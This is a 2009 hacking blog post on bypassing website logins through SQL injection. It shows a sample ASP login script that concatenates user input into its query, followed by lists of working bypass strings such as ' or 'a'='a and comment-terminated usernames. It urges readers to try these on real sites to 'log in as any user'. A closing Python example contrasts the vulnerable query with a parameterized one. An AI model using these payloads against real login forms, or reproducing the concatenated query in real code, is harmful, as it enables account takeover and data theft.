Database Servers.

Posted on 02/12/2009 by




Databases are the heart of a profitable website. An attack on the database servers can cause immense economic loss for the company. Database servers are usually hacked to get credit card information, and just one successful hack on a commercial site will damage its name and drive away its customers, who want their credit card details kept secure. Most commercial websites use Microsoft SQL Server (MSSQL) or Oracle database servers. MSSQL still owns the market because its price is very low, while Oracle servers come at a high price. Some time ago Oracle claimed itself to be "unbreakable!", but hackers took that as a challenge and found plenty of bugs in it too...
This is very useful not only to hackers but also to web designers: a common mistake made by web designers can reveal the server's databases to a hacker. The whole game is about query strings, so it is assumed that the reader has some knowledge of SQL queries and ASP. This hack is done entirely through the browser, so you don't need any tools other than IE or Netscape.

A web designer might use code like this to make a login page:
Example:
login.htm

<html>
<body>
<form method="post" action="logincheck.asp">
<input type="text" name="login_name">
<input type="password" name="pass">
<input type="submit" value="sign in">
</form>
</body>
</html>

logincheck.asp

<%@ language="vbscript" %>
<%
dim conn, rs, log, pwd
log = Request.Form("login_name")
pwd = Request.Form("pass")

' Open the Access database through the Jet OLEDB provider
set conn = Server.CreateObject("ADODB.Connection")
conn.ConnectionString = "provider=microsoft.jet.OLEDB.4.0;data source=c:\folder\multiplex.mdb"
conn.Open

' The user's input is concatenated straight into the SQL text (this is the mistake discussed below)
set rs = Server.CreateObject("ADODB.Recordset")
rs.Open "Select * from table1 where login='" & log & "' and password='" & pwd & "'", conn
If rs.EOF Then
    Response.Write("Login failed")
Else
    Response.Write("Login successful")
End If
rs.Close
conn.Close
%>

The above code at first sight seems completely fine. The user types his/her login name and password in the login.htm page and clicks the submit button. The values of the text boxes are passed to the logincheck.asp page, where they are checked using the query string; if no row satisfies the query, the recordset is at end of file and the "Login failed" message is displayed. Everything seems to be all right! But... just a minute... think again. What about the query? Is it all right? Well, if you've made a page like this then a hacker can easily log in without knowing the password. How? Here is the query again.

"Select * from table1 where login='" & log & "' and password='" & pwd & "'"

Now if the user types his/her login name as "Ellahax" and password as "h@X3r", these values are passed to the ASP page with the POST method and the above query becomes:

Select * from table1 where login='Ellahax' and password='h@X3r'

This is fine: there is a row with Ellahax and h@X3r in the login and password fields of the database, so you get the message "Login successful". Now what if I type the login name as "Ellahax" and, in the password text box, the password as
hi' or 'a'='a ? The query becomes:

Select * from table1 where login='Ellahax' and password='hi' or 'a'='a'

Then you submit it and voila! You get the "Login successful" message. Now do you see the brains of a hacker at work, made possible by the carelessness of the web designer? The query is satisfied because its meaning changes: the password has to be 'hi', or 'a' has to equal 'a'. Clearly the password is not 'hi', but 'a'='a' is always true, so the condition is satisfied and the hacker is in with the login 'Ellahax'!

Example:

hi" or "a"="a
hi" or 1=1--
hi' or 1=1--
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a

Everything after -- becomes a comment, so the remaining conditions of the query are never checked. In the same way you can put:

Example:

Ellahax' --
Ellahax" --

in the login name text box, and there are other strings for the login name, the password, or anything else that has a chance of letting you in, because in the query string only the login name is checked as "Ellahax" and the rest is ignored thanks to --. If you're lucky enough to find a website where the web designer has made the above mistake, you'll be able to log in as any user!
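As an added example that is not part of the original post, here the concatenated query from logincheck.asp and a parameterized version of it sit side by side in Python with sqlite3 (standing in for the Access database and ADODB; the table and its single row are constructed), so you can check that the inputs listed above satisfy the first query and are rejected by the second:

```python
import sqlite3

# Constructed in-memory stand-in for c:\folder\multiplex.mdb and its table1.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE table1 (login TEXT, password TEXT)")
    conn.execute("INSERT INTO table1 VALUES (?, ?)", ("Ellahax", "h@X3r"))
    return conn

def login_concat(conn, log, pwd):
    """Mirrors logincheck.asp: the user's text becomes part of the SQL itself,
    so quote characters and -- inside the input change what the query means."""
    sql = ("Select * from table1 where login='" + log +
           "' and password='" + pwd + "'")
    return conn.execute(sql).fetchone() is not None  # True = "Login successful"

def login_param(conn, log, pwd):
    """Hardened form: placeholders in the SQL, values handed to the driver
    separately, so the input is compared as data and never parsed as SQL."""
    sql = "Select * from table1 where login=? and password=?"
    return conn.execute(sql, (log, pwd)).fetchone() is not None

def compare(conn, log, pwd):
    """Run both checks on one login attempt and report what each would decide."""
    return {"concat": login_concat(conn, log, pwd),
            "param": login_param(conn, log, pwd)}

if __name__ == "__main__":
    db = make_db()
    for log, pwd in [("Ellahax", "h@X3r"),          # the real credentials
                     ("Ellahax", "hi' or 'a'='a"),   # password bypass from the post
                     ("Ellahax' --", "anything")]:   # login only, rest commented out
        print(repr(log), repr(pwd), compare(db, log, pwd))
```

Only the real credentials log in through the parameterized query; the concatenated one also accepts the two injected inputs.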

Enjoy! 🙂

Posted in: Hacking, Web Hacking